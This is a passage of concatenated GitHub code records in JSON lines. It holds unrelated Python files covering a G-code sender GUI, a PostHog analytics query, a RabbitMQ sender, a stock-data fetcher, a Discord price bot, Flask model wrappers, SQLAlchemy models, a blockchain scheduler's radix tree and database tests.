x_max, n_points)\n # y_grid = np.linspace(y_min, y_max, n_points)\n # x_grid, y_grid = np.meshgrid(x_grid, y_grid)\n\n # # Define a function for the flat surface (you can use any function)\n # # For example, a flat surface at z = 0\n # z_grid = np.zeros_like(x_grid)\n\n # # Optionally, add some noise to the surface for realism\n # noise_amplitude = 0.05\n # z_grid += np.random.normal(scale=noise_amplitude, size=z_grid.shape)\n\n # # Create a PyVista structured grid\n # grid = pv.StructuredGrid(x_grid, y_grid, z_grid)\n\n # # Add the grid to the PyVista plotter\n # self.plotter.add_mesh(grid, cmap=\"viridis\")\n # # Create a PyVistaQt interactor and embed it in the Toplevel window\n # interactor = QtInteractor(self.plotter)\n # interactor.interactor.Initialize()\n # interactor.interactor.Start()\n \n # self.plotter.place(x=300,y=50)\n # # plotter_widget.pack(fill=tk.BOTH, expand=True)\n\n # # #Help menu\n # # # self.menubar.add_menu(label=\"Help\")\n\n # # #file panel\n # # self.file_panel=CustomFileFrame(self,width=200,height=self.height-30,bg=self.sidebars_bg)\n # # self.file_panel.place(x=0,y=30)\n \n # # self.file_panel.add_files(self.vault)\n # # self.bind_files()\n\n def move_window(self,x,y):\n self.geometry(\"{}x{}+{}+{}\".format(self.width,self.height,x,y))\n\n def quit(self,*args):\n exit()","repo_name":"jOrtegaFreire/MarlinGCodeSender","sub_path":"windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":8887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13744238906","text":"'''На техническом собеседовании претенденты на должность получают оценку за тест. В следующий тур собеседования проходят кандидаты, \nсдавшие тест на 83 балла включительно или выше. Реализуйте оператор контроля выполнения так, чтобы он присвоил логической переменной is_next значение True, \nесли количество набранных баллов будет больше или равно 83. В противном случае значение переменной равно False.'''\n\nis_next = None\nnum = int(input(\"Введите количество баллов: \"))\n\nif num >= 83:\n is_next = True\nelse:\n is_next = False\n","repo_name":"shuaaam/goit-python-hw1-5","sub_path":"module-2/hw2_1.py","file_name":"hw2_1.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39513050859","text":"from typing import Any, Dict, Tuple\n\nfrom posthog.constants import TREND_FILTER_TYPE_ACTIONS, PropertyOperatorType\nfrom posthog.models import Entity\nfrom posthog.models.action.util import format_action_filter\nfrom posthog.models.filters.mixins.utils import cached_property\nfrom posthog.models.filters.stickiness_filter import StickinessFilter\nfrom posthog.queries.event_query import EventQuery\nfrom posthog.queries.person_query import PersonQuery\nfrom posthog.queries.util import get_person_properties_mode, get_start_of_interval_sql\nfrom posthog.utils import PersonOnEventsMode\n\n\nclass StickinessEventsQuery(EventQuery):\n _entity: Entity\n _filter: StickinessFilter\n\n def __init__(self, entity: Entity, *args, **kwargs):\n self._entity = entity\n super().__init__(*args, **kwargs)\n\n def get_query(self) -> Tuple[str, Dict[str, Any]]:\n prop_query, prop_params = self._get_prop_groups(\n self._filter.property_groups.combine_property_group(PropertyOperatorType.AND, self._entity.property_groups),\n person_properties_mode=get_person_properties_mode(self._team),\n person_id_joined_alias=self._person_id_alias,\n )\n\n self.params.update(prop_params)\n\n actions_query, actions_params = self.get_actions_query()\n self.params.update(actions_params)\n\n date_query, date_params = self._get_date_filter()\n self.params.update(date_params)\n\n person_query, person_params = self._get_person_query()\n self.params.update(person_params)\n\n groups_query, groups_params = self._get_groups_query()\n self.params.update(groups_params)\n\n null_person_filter = (\n f\"AND notEmpty({self.EVENT_TABLE_ALIAS}.person_id)\"\n if self._person_on_events_mode != PersonOnEventsMode.DISABLED\n else \"\"\n )\n\n sample_clause = \"SAMPLE %(sampling_factor)s\" if self._filter.sampling_factor else \"\"\n self.params.update({\"sampling_factor\": self._filter.sampling_factor})\n\n query = f\"\"\"\n SELECT\n {self.aggregation_target()} AS aggregation_target,\n countDistinct(\n {get_start_of_interval_sql(self._filter.interval, team=self._team)}\n ) as num_intervals\n FROM events {self.EVENT_TABLE_ALIAS}\n {sample_clause}\n {self._get_person_ids_query()}\n {person_query}\n {groups_query}\n WHERE team_id = %(team_id)s\n {date_query}\n AND {actions_query}\n {prop_query}\n {null_person_filter}\n GROUP BY aggregation_target\n \"\"\"\n\n return query, self.params\n\n @cached_property\n def _person_query(self):\n return PersonQuery(\n self._filter,\n self._team_id,\n self._column_optimizer,\n extra_fields=self._extra_person_fields,\n entity=self._entity,\n )\n\n def _determine_should_join_distinct_ids(self) -> None:\n if self._person_on_events_mode == PersonOnEventsMode.V1_ENABLED:\n self._should_join_distinct_ids = False\n else:\n self._should_join_distinct_ids = True\n\n def _determine_should_join_persons(self) -> None:\n EventQuery._determine_should_join_persons(self)\n if self._person_on_events_mode != PersonOnEventsMode.DISABLED:\n self._should_join_persons = False\n\n def aggregation_target(self):\n return self._person_id_alias\n\n def get_actions_query(self) -> Tuple[str, Dict[str, Any]]:\n if self._entity.type == TREND_FILTER_TYPE_ACTIONS:\n return format_action_filter(\n team_id=self._team_id,\n action=self._entity.get_action(),\n person_properties_mode=get_person_properties_mode(self._team),\n person_id_joined_alias=f\"{self.aggregation_target()}\",\n hogql_context=self._filter.hogql_context,\n )\n elif self._entity.id is None:\n return \"1 = 1\", {}\n else:\n return \"event = %(event)s\", {\"event\": self._entity.id}\n","repo_name":"PostHog/posthog","sub_path":"posthog/queries/stickiness/stickiness_event_query.py","file_name":"stickiness_event_query.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"73859784488","text":"#!/usr/bin/env python\r\n\r\n#Importing the Python Library for RabbitMQ\r\nimport pika\r\nimport json\r\nimport requests\r\n\r\n#Creating a connection to RabbitMQ\r\n#Assuming RabbitMQ is running on localhost\r\n#If not, change the host to the IP address of the machine where RabbitMQ is running\r\n\r\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\r\nchannel = connection.channel()\r\n\r\n#Creating a queue named hello\r\n#If the queue already exists, this method does nothing\r\n\r\nchannel.queue_declare(queue = 'task_queue')\r\nmessage = {'id': 1, 'name': 'name1'}\r\n\r\n#Publishing a message to the queue\r\n#Json dumps is used to convert the message to a string\r\nchannel.basic_publish(exchange='',\r\n routing_key='task_queue',\r\n body=json.dumps(message),\r\n properties=pika.BasicProperties(\r\n delivery_mode = 2, # make message persistent\r\n ))\r\nprint(\" [x] Sent %r\" % message)\r\n\r\n#connection.close()\r\nconnection.close()\r\n","repo_name":"harindergarcha/CS361-Assignment-8","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29313584993","text":"\nimport os\nimport json\nimport logging\nimport aiohttp\nimport asyncio\nimport sys\nfrom collections import namedtuple\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s,%(msecs)d %(levelname)s: %(message)s\",\n datefmt=\"%H:%M:%S\",\n)\nlog = logging\n\n\nclass FetchAlphaVantage(object):\n _BASE_API_URL = \"https://www.alphavantage.co/query?function=\"\n _API_URL_TIME_SERIES_ADJ = _BASE_API_URL + \\\n \"TIME_SERIES_DAILY_ADJUSTED&symbol=\"\n _API_URL_FOREX_WEEKLY = _BASE_API_URL + \"FX_WEEKLY\"\n\n _RATE_LIMIT = 5\n\n def __init__(self, api_key=None,\n symbols: list = [],\n out_path='../data/data_raw/'):\n\n if api_key is None:\n api_key = os.environ.get('ALPHA_VANTAGE_API_KEY')\n if not api_key or not isinstance(api_key, str):\n raise ValueError(\n 'you need to provide a valid Alpha Vantage API key')\n if not isinstance(symbols, list):\n raise ValueError('symbols parameter needs to be a list type')\n self._out_path = out_path\n StockInfo: tuple = namedtuple('Stock', ['symbol', 'url'])\n self._stocks_meta: list = [\n StockInfo(symbol,\n FetchAlphaVantage._API_URL_TIME_SERIES_ADJ + symbol +\n \"&outputsize=full\" + f\"&apikey={api_key}\")\n for symbol in symbols\n ]\n\n self._loop = asyncio.get_event_loop()\n self._loop.set_debug(True)\n self._sema = asyncio.Semaphore(FetchAlphaVantage._RATE_LIMIT)\n self._loop.run_until_complete(self._fetch_all())\n\n async def _fetch_all(self):\n # API call frequency is 5 calls per minute and\n # 500 calls per day, so we need to rate limit our requests :/\n async with aiohttp.ClientSession(loop=self._loop) as session:\n await asyncio.gather(*[self._fetch(session, stock_meta.symbol, stock_meta.url) for stock_meta in self._stocks_meta],\n return_exceptions=True)\n\n async def _fetch(self, session, symbol, url):\n async with self._sema, session.get(url) as response:\n response.raise_for_status()\n log.info(\n \"Got response [%s] for URL: %s with symbol: %s\", response.status, url, symbol)\n data = await response.json()\n # print(data)\n FetchAlphaVantage._write_json_file(self._out_path, symbol, data)\n await asyncio.sleep(60)\n # 5 calls per minute are permitted by this API\n\n @staticmethod\n def _write_json_file(out_path, symbol, data):\n with open(f'../data/data_raw/data_{symbol}.json', \"w\") as write_json:\n json.dump(data, write_json, indent=2, sort_keys=False)\n\n log.info(\"Wrote results for symbol: %s\", symbol)\n\n\nif __name__ == \"__main__\":\n symbols: list = ['aapl', 'abt', 'adbe', 'amd', 'amzn', 'baba',\n 'brkb', 'c', 'cmcsa', 'cost', 'crm', 'dell', 'f', 'fb', 'googl', 'ibm', 'intc',\n 'intu', 'jnj', 'jpm', 'msft', 'mu', 'nflx', 'nke', 'nvda', 'orcl', 'pfe', 'pg',\n 'pypl', 'sbux', 't', 'tsla', 'twtr', 'unh', 'v', 'vz', 'wfc', 'wmt']\n\n FetchAlphaVantage(symbols=symbols)\n","repo_name":"schairez/stock-analysis-py","sub_path":"stocktools/alpha_vantage.py","file_name":"alpha_vantage.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38282421545","text":"def duplicates(arr, n):\n dic={}\n l=[]\n for x in arr:\n if x in dic:\n dic[x]=dic[x]+1\n else:\n dic[x]=1\n for i in dic:\n if dic[i]>1:\n l.append(i)\n if(len(l)==0):\n return [-1]\n else:\n l.sort()\n return l\n \n \n\t# code here\n\t \n\n\n\n#{ \n# Driver Code Starts\nif(__name__=='__main__'):\n t = int(input())\n for i in range(t):\n n = int(input())\n arr = list(map(int, input().strip().split()))\n res = duplicates(arr, n)\n for i in res:\n print(i,end=\" \")\n print()\n\n\n\n# } Driver Code Ends\n","repo_name":"AprajitaChhawi/365DaysOfCode.JANUARY","sub_path":"Day 11 find duplicate elements.py","file_name":"Day 11 find duplicate elements.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15457080265","text":"import pandas as pd \nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\ncsv_path = '/home/member/Workspace/haimd/classfication_pytorch/train.csv'\n\ndata = pd.read_csv(csv_path)\nx, y = data.iloc[:, 0], data.iloc[:, 1]\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2)\n\ndf_train = pd.DataFrame.from_dict({'image_id': x_train, 'label':y_train})\ndf_test = pd.DataFrame.from_dict({'image_id': x_test, 'label':y_test})\ndf_train.to_csv('tn.csv', index=False)\ndf_test.to_csv('tt.csv', index=False)\n# import ipdb; ipdb.set_trace()","repo_name":"vodanhbk95/classification_pytorch","sub_path":"src/split_dataset.py","file_name":"split_dataset.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74817238886","text":"import requests\nimport discord\nimport json\nfrom discord.ext.tasks import loop\n\n\ndef get_price():\n a = requests.get('https://api.binance.com/api/v3/ticker/price?symbol=ETHUSDT')\n json_data = json.loads(a.text)\n price = round(float(json_data['price']), 3)\n return price\n\n\ndef get_change():\n a = requests.get('https://api.binance.com/api/v3/ticker/24hr?symbol=ETHUSDT')\n json_data = json.loads(a.text)\n t = \"\"\n if float(json_data['priceChangePercent']) >= 0:\n t = \"+\"\n else:\n t = \"\"\n per = str(\n \"{2}{0} ({2}{1}%)\".format(round(float(json_data['priceChange']), 3),\n round(float(json_data['priceChangePercent']), 2), t))\n\n return per, t\n\n\nclient = discord.Client()\nprint(get_price())\ntk = ''\ncolor = \"-\"\n\n\n@client.event\nasync def on_ready():\n print(\"We have logged in as {0.user}\".format(client))\n set_name.start()\n\n\n@loop(count=None, seconds=1)\nasync def set_name():\n name = \"ETH $\" + str(get_price())\n global color\n change = get_change()\n st = change[0]\n if color != change[1]:\n color = change[1]\n if color == \"+\":\n for x in client.guilds:\n rrole = x.get_role(846495911135936542)\n grole = x.get_role(846495878130958406)\n try:\n await x.me.add_roles(grole)\n await x.me.remove_roles(rrole)\n except:\n pass\n else:\n for x in client.guilds:\n rrole = x.get_role(846495911135936542)\n grole = x.get_role(846495878130958406)\n\n try:\n await x.me.add_roles(rrole)\n await x.me.remove_roles(grole)\n\n except:\n pass\n\n await client.change_presence(activity=discord.Game(st))\n for i in client.guilds:\n await i.me.edit(nick=name)\n\n\nclient.run(tk)\n","repo_name":"AdityaPunetha/Binance-Ticker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21647076881","text":"from opengpt.models.completion.evagpt4.model import Model as EvaGPT4_Model\nfrom opengpt.models.image.hotpot.model import Model as Hotpot_Model\nfrom opengpt.models.completion.chatbase.model import Model as ChatBase_Model\nfrom opengpt.models.completion.chatllama.model import Model as ChatLlama_Model\n\nfrom flask import Flask,request\nimport pandas as pd\napp = Flask(__name__)\n\n@app.route('/EvaGPT4',methods=['POST'])\ndef EvaGPT4():\n evagpt4 = EvaGPT4_Model()\n messages = request.json[\"messages\"]\n df=pd.DataFrame(messages)\n df=df[[\"role\",\"content\"]]\n df=df.to_dict(orient=\"records\")\n # messages = [\n # {\"role\": \"system\", \"content\": \"You are Ava, an AI Agent.\"},\n # {\"role\": \"assistant\", \"content\": \"Hello! How can I help you today?\"},\n # {\"role\": \"user\", \"content\": \"\"\"GPT4\"\"\"}\n # ] # List of messages in the chat history\n\n result = evagpt4.ChatCompletion(df)\n return result\n\n@app.route('/Hotpot',methods=['POST'])\ndef Hotpot():\n request_data = request.get_json()\n style=\"Hotpot Art 9\"\n width=1250\n height=1000\n prompt=None\n\n if request_data:\n if \"style\" in request_data:\n style = request_data[\"style\"]\n\n if \"width\" in request_data:\n width = request_data[\"width\"]\n\n if \"height\" in request_data:\n height = request_data[\"height\"]\n\n if \"prompt\" in request_data:\n prompt = request_data[\"prompt\"]\n\n Hotpot = Hotpot_Model(style=style)\n\n result = Hotpot.Generate(prompt=prompt,width=width,height=height)\n\n return {\"url\":result.url}\n\n@app.route('/ChatBase',methods=['POST'])\ndef ChatBase():\n messages = request.json[\"messages\"]\n df=pd.DataFrame(messages)\n df=df.loc[len(df)-1,\"content\"]\n chatbase = ChatBase_Model()\n result =chatbase.GetAnswer(prompt=df, model=\"gpt-4\")\n\n return result\n\n\n@app.route('/ChatLlama',methods=['POST'])\ndef ChatLlama():\n messages = request.json[\"messages\"]\n df=pd.DataFrame(messages)\n df=df.loc[len(df)-1,\"content\"]\n ChatLlama = ChatLlama_Model()\n result =ChatLlama.GetAnswer(prompt=df)\n return result\n\n\n# app.run(debug=True)","repo_name":"Avirupsett/OpenGPT","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15868209163","text":"import sys\nimport torch\nimport torchvision\nimport numpy as np\nfrom PIL import Image\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\n\ncuda = 1\ngpu_id = 0\ndevice = torch.device(\"cuda:\"+str(gpu_id) if torch.cuda.is_available() and cuda == 1 else \"cpu\")\nprint(\"Device:\", device)\n\n\nfolder = sys.argv[1]\ntask = sys.argv[2]\n\ngenerator = torch.load(\"saved_models/generator_model_\"+task+\"_3.pt\", map_location='cpu').to(device)\ngenerator.eval()\nroot_dir_input = \"datasets/\"+folder+\"/test_\"+task+\"/input/\"\nroot_dir_output = \"datasets/\"+folder+\"/test_\"+task+\"/output/\"\nfiles = os.listdir(root_dir_input)\n\nwith torch.no_grad():\n\tfor file in files:\n\t\tinp = Image.open(root_dir_input + file)\n\t\ttrans = torchvision.transforms.ToTensor()\n\t\ttrans1 = torchvision.transforms.ToPILImage()\n\t\ttensor = 2.0*(trans(inp)-0.5).to(device)\n\t\ttensor = tensor.view(1,tensor.shape[0],tensor.shape[1],tensor.shape[2])\n\t\toutput = ((generator(tensor)/2.0)+0.5)\n\t\t# tensor = ((tensor/2.0)+0.5)\n\t\toutput = output.view(output.shape[1],output.shape[2],output.shape[3])\n\t\t\n\t\toutput_image = trans1(output)\n\n\t\t# output_image.show()\n\t\toutput_image.save(root_dir_output+file)\n\t\tprint(\"Image %s done\" % (file))","repo_name":"darth-c0d3r/pix2pix","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9714745334","text":"from sqlalchemy import Column, ForeignKey\nfrom sqlalchemy import String, Integer, Date\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\n\nfrom pyramid_oereb.contrib.data_sources.standard.models import (\n get_office,\n get_view_service,\n get_legend_entry,\n get_geometry\n)\n\n\nclass Models(object):\n\n def __init__(self, office, view_service,\n legend_entry, public_law_restriction, geometry, base,\n db_connection, schema_name):\n\n self.Office = office\n self.ViewService = view_service\n self.LegendEntry = legend_entry\n self.PublicLawRestriction = public_law_restriction\n self.Geometry = geometry\n self.Base = base\n self.db_connection = db_connection\n self.schema_name = schema_name\n\n\ndef model_factory(schema_name, pk_type, geometry_type, srid, db_connection):\n \"\"\"\n Factory to produce a set of standard models.\n\n Args:\n schema_name (str): The name of the database schema where this models belong to.\n pk_type (sqlalchemy.sql.type_api.TypeEngine): The type of the primary column. E.g.\n sqlalchemy.String or sqlalchemy.Integer or another one fitting the underlying DB\n needs\n geometry_type (str): The geoalchemy geometry type defined as well known string.\n srid (int): The SRID defining the projection of the geometries stored in standard db schema.\n \"\"\"\n Base = declarative_base()\n\n Office = get_office(Base, schema_name, pk_type)\n ViewService = get_view_service(Base, schema_name, pk_type)\n LegendEntry = get_legend_entry(Base, schema_name, pk_type, ViewService)\n\n class PublicLawRestriction(Base):\n \"\"\"\n The container where you can fill in all your public law restrictions to the topic.\n\n Attributes:\n id (str): The identifier. This is used in the database only and must not be set manually. If\n you don't like it - don't care about.\n law_status (str): The status switch if the document is legally approved or not.\n published_from (datetime.date): The date when the document should be available for\n publishing on extracts. This directly affects the behaviour of extract\n generation.\n published_until (datetime.date): The date starting from which the document should not be\n published anymore on extracts. This directly affects the behaviour of extract generation.\n geolink (int): The OEREBlex GEO-Link ID to query the documents.\n view_service_id (str): The foreign key to the view service this public law restriction is\n related to.\n view_service (ViewService):\n The dedicated relation to the view service instance from database.\n office_id (str): The foreign key to the office which is responsible to this public law\n restriction.\n responsible_office (Office):\n The dedicated relation to the office instance from database.\n legend_entry_id (str): The foreign key to the legend entry this public law restriction is\n related to.\n legend_entry (pyramid_oereb.standard.models.airports_building_lines.LegendEntry):\n The dedicated relation to the legend entry instance from database.\n \"\"\"\n __table_args__ = {'schema': schema_name}\n __tablename__ = 'public_law_restriction'\n id = Column(pk_type, primary_key=True, autoincrement=False)\n law_status = Column(String, nullable=False)\n published_from = Column(Date, nullable=False)\n published_until = Column(Date, nullable=True)\n geolink = Column(Integer, nullable=False)\n view_service_id = Column(\n ForeignKey(ViewService.id),\n nullable=False\n )\n view_service = relationship(\n ViewService,\n backref='public_law_restrictions'\n )\n office_id = Column(\n ForeignKey(Office.id),\n nullable=False\n )\n responsible_office = relationship(Office)\n legend_entry_id = Column(\n ForeignKey(LegendEntry.id),\n nullable=False\n )\n legend_entry = relationship('LegendEntry', backref='public_law_restrictions')\n\n Geometry = get_geometry(Base, schema_name, pk_type, geometry_type, srid, PublicLawRestriction)\n\n return Models(\n Office, ViewService,\n LegendEntry, PublicLawRestriction, Geometry, Base,\n db_connection, schema_name\n )\n\n\ndef model_factory_string_pk(schema_name, geometry_type, srid, db_connection):\n \"\"\"\n Args:\n schema_name (str): The name of the database schema where this models belong to.\n geometry_type (str): The geoalchemy geometry type defined as well known string.\n srid (int): The SRID defining the projection of the geometries stored in standard db schema.\n db_connection (str): the db connection string\n\n Returns:\n Models: the produced set of standard models\n \"\"\"\n return model_factory(schema_name, String, geometry_type, srid, db_connection)\n\n\ndef model_factory_integer_pk(schema_name, geometry_type, srid, db_connection):\n \"\"\"\n Args:\n schema_name (str): The name of the database schema where this models belong to.\n geometry_type (str): The geoalchemy geometry type defined as well known string.\n srid (int): The SRID defining the projection of the geometries stored in standard db schema.\n db_connection (str): the db connection string\n\n Returns:\n Models: the produced set of standard models\n \"\"\"\n return model_factory(schema_name, Integer, geometry_type, srid, db_connection)\n","repo_name":"openoereb/pyramid_oereb","sub_path":"pyramid_oereb/contrib/data_sources/oereblex/models/theme.py","file_name":"theme.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"37832107476","text":"import graphene\n\nfrom ideahunt.graphql.objects import CommentModel\nfrom ideahunt.helpers import assert_authenticated_user\nfrom ideahunt.models import Comment, db\n\n\nclass CreateComment(graphene.Mutation):\n \"\"\"\n Create Comment mutation\n \"\"\"\n\n comment = graphene.Field(lambda: CommentModel)\n\n class Arguments:\n description = graphene.String(required=True)\n idea_id = graphene.ID(required=True)\n\n def mutate(root, info, **kwargs):\n assert_authenticated_user(info.context)\n viewer = info.context.viewer\n comment = Comment(\n description=kwargs.get(\"description\"),\n idea_id=kwargs.get(\"idea_id\"),\n author_id=viewer.id,\n )\n db.session.add(comment)\n db.session.commit()\n return CreateComment(comment=comment)\n","repo_name":"drizzleco/ideahunt","sub_path":"ideahunt/ideahunt/graphql/mutations/create_comment.py","file_name":"create_comment.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35153771357","text":"from ast import literal_eval\n\n\nclass RadixNode:\n def __init__(self, children=None, readers=None, writer=None):\n self.children = children if children is not None else {}\n self.readers = readers if readers is not None else []\n self.writer = writer\n\n def __repr__(self):\n retval = {}\n\n if len(self.readers) > 0:\n retval['readers'] = self.readers\n if self.writer is not None:\n retval['writer'] = self.writer\n if len(self.children) > 0:\n retval['children'] = \\\n {k: literal_eval(repr(v)) for k, v in self.children.items()}\n\n return repr(retval)\n\n\nclass RadixTree:\n def __init__(self, token_size=2):\n self._token_size = token_size\n self._root = RadixNode()\n\n def __repr__(self):\n return repr(self._root)\n\n def _tokenize_address(self, address):\n return [address[i:i + self._token_size]\n for i in range(0, len(address), self._token_size)]\n\n def _get(self, address, create=False):\n tokens = self._tokenize_address(address)\n\n node = self._root\n for token in tokens:\n if token in node.children:\n node = node.children[token]\n else:\n if not create:\n return None\n child = RadixNode()\n node.children[token] = child\n node = child\n\n return node\n\n def get(self, address):\n return self._get(address)\n\n def add_reader(self, address, reader):\n node = self._get(address, create=True)\n node.readers.append(reader)\n\n def set_writer(self, address, writer):\n node = self._get(address, create=True)\n node.readers = []\n node.writer = writer\n node.children = {}\n\n def find_readers_and_writers(self, address):\n readers_and_writers = []\n\n tokens = self._tokenize_address(address)\n\n node = self._root\n for token in tokens:\n if token in node.children:\n node = node.children[token]\n else:\n break\n\n readers_and_writers.extend(node.readers)\n if node.writer is not None and \\\n node.writer not in readers_and_writers:\n readers_and_writers.append(node.writer)\n\n return readers_and_writers\n\n\nclass TopologicalSorter:\n def __init__(self):\n self._count = {}\n self._successors = {}\n self._identifiers = []\n\n def _init(self, identifier):\n if identifier not in self._count:\n self._count[identifier] = 0\n if identifier not in self._successors:\n self._successors[identifier] = []\n if identifier not in self._identifiers:\n self._identifiers.append(identifier)\n\n def add_relation(self, predecessor, successor):\n self._init(predecessor)\n self._init(successor)\n self._count[successor] += 1\n self._successors[predecessor].append(successor)\n\n def order(self):\n retval = []\n\n while len(self._identifiers) > 0:\n found = None\n for identifier in self._identifiers:\n if self._count[identifier] == 0:\n found = identifier\n break\n if found is not None:\n retval.append(found)\n for successor in self._successors[found]:\n self._count[successor] -= 1\n\n self._identifiers.remove(found)\n del self._count[found]\n del self._successors[found]\n else:\n raise Exception(\"non-acyclic graph detected, aborting\")\n\n return retval\n","repo_name":"vdt/sawtooth-core","sub_path":"validator/sawtooth_validator/scheduler/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74466493928","text":"import unittest\nfrom src import db\n\nfrom src.database.models import Alerts, AnomalyEquations, EmailInformation, DeviceInformation\n\n\nclass TestInsert(unittest.TestCase):\n \"\"\"Tests insertion of objects into database tables using sqlalchemy\"\"\"\n\n def setUp(self) -> None:\n self.db = db\n self.db.create_session()\n self.alert = Alerts(alert_type='IDS', description='test', severity=1, mac_address='00:00:00:00:00',\n payload='foobar')\n self.anamoly_eq = AnomalyEquations(average_equation=\"test\", adjustment_equation=\"test\")\n self.email_info = EmailInformation(recipient_addresses='test@email.com, foo@bar.com',\n sender_address='openwrt@alert.com',\n sender_email_password='super_secure_password',\n smtp_server='smtp.test.com')\n self.device_info = DeviceInformation(mac_address='00:00:00:00:00:00',\n name='test',\n ip_address='192.168.0.1')\n\n def test_insert_alert(self):\n Alerts.insert_new_object(self.alert)\n result = self.db.session.query(Alerts).filter(Alerts.description == 'test').first()\n self.assertEqual(self.alert, result)\n self.db.session.delete(result)\n\n def test_insert_anomaly_equation(self):\n AnomalyEquations.insert_new_object(self.anamoly_eq)\n result = self.db.session.query(AnomalyEquations).filter(AnomalyEquations.average_equation == \"test\").first()\n self.assertEqual(self.anamoly_eq, result)\n self.db.session.delete(result)\n\n def test_insert_email_information(self):\n EmailInformation.insert_new_object(self.email_info)\n result = self.db.session.query(EmailInformation).filter(\n EmailInformation.recipient_addresses == \"test@email.com, foo@bar.com\") \\\n .first()\n self.assertEqual(self.email_info, result)\n self.db.session.delete(result)\n\n def test_insert_device_information(self):\n DeviceInformation.insert_new_object(self.device_info)\n result = self.db.session.query(DeviceInformation).filter(\n DeviceInformation.mac_address == \"00:00:00:00:00:00\") \\\n .first()\n self.assertEqual(self.device_info, result)\n self.db.session.delete(result)\n\n def tearDown(self) -> None:\n self.db.session.commit()\n\n if __name__ == '__main__':\n unittest.main()\n","repo_name":"briweinstein/tinyHIPPO","sub_path":"tests/database_tests/test_insert.py","file_name":"test_insert.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"73208324647","text":"from flask import Flask, request, render_template\r\nfrom flask_cors import cross_origin\r\nfrom flask import Response\r\nfrom functions import count_n_grams, load_data\r\nfrom preprocessing import Preprocessor\r\nfrom model_building import ModelBuilding\r\nimport json\r\nimport pickle\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\n@cross_origin()\r\ndef home():\r\n return render_template(\"home.html\")\r\n\r\n\r\n@app.route(\"/train\", methods=['POST'])\r\n@cross_origin()\r\ndef trainRouteClient():\r\n\r\n try:\r\n if request.json['max_ngram'] is not None:\r\n max = request.json['max_ngram']\r\n\r\n path_dataset = 'en_US.twitter.txt'\r\n data = load_data(path_dataset)\r\n preprocessor = Preprocessor()\r\n tokenized_training_sentences = preprocessor.get_tokenized_data(data)\r\n nr_unique_words = len(set([y for x in tokenized_training_sentences for y in x]))\r\n\r\n dic_ngram_counts = {}\r\n\r\n for i in range(1, max+1):\r\n i_gram_counts = count_n_grams(tokenized_training_sentences, i)\r\n dic_ngram_counts[i] = i_gram_counts\r\n\r\n model_training_infos = {'nr_unique_words': nr_unique_words,\r\n 'dic_ngram_counts': dic_ngram_counts}\r\n with open(\"model_training_infos.pkl\", \"wb\") as file:\r\n pickle.dump(model_training_infos, file)\r\n\r\n with open(\"max_ngram.pkl\", \"wb\") as file:\r\n pickle.dump(max, file)\r\n\r\n except Exception as e:\r\n\r\n return Response(\"Error Occurred! %s\" % e)\r\n return Response(\"N_Grams Counts Built Successfully / Training successfull!!\")\r\n\r\n\r\n@app.route(\"/tuning\", methods=['POST'])\r\n@cross_origin()\r\ndef tuneClient():\r\n try:\r\n threshold_values = [pow(10, i) for i in range(-20, -12, 1)]\r\n k_values = np.linspace(0.1, 0.9, 8)\r\n with open('model_training_infos.pkl', 'rb') as file:\r\n encoded_training_infos = pickle.load(file)\r\n nr_unique_words = encoded_training_infos['nr_unique_words']\r\n dic_ngram_counts = encoded_training_infos['dic_ngram_counts']\r\n\r\n test_sentences_labels = [['How are you', 1],\r\n ['I am going home.', 1],\r\n ['I are going here.', 0],\r\n ['This are perfect', 0],\r\n ['This is perfect', 1],\r\n ['I am doing it.', 1],\r\n ['These man is very dangerous', 0],\r\n ['Today i am very tired!', 1],\r\n ['He has been doing this job for many years as a data scientist in finance domain.',\r\n 1],\r\n [\"You has helped me !\", 0],\r\n [\"My university are over there\", 0],\r\n [\"My mom cook pancakes for breakfast.\", 0]]\r\n\r\n test_sentences = [sent[0] for sent in test_sentences_labels]\r\n true_labels = [x[1] for x in test_sentences_labels]\r\n\r\n model_builder = 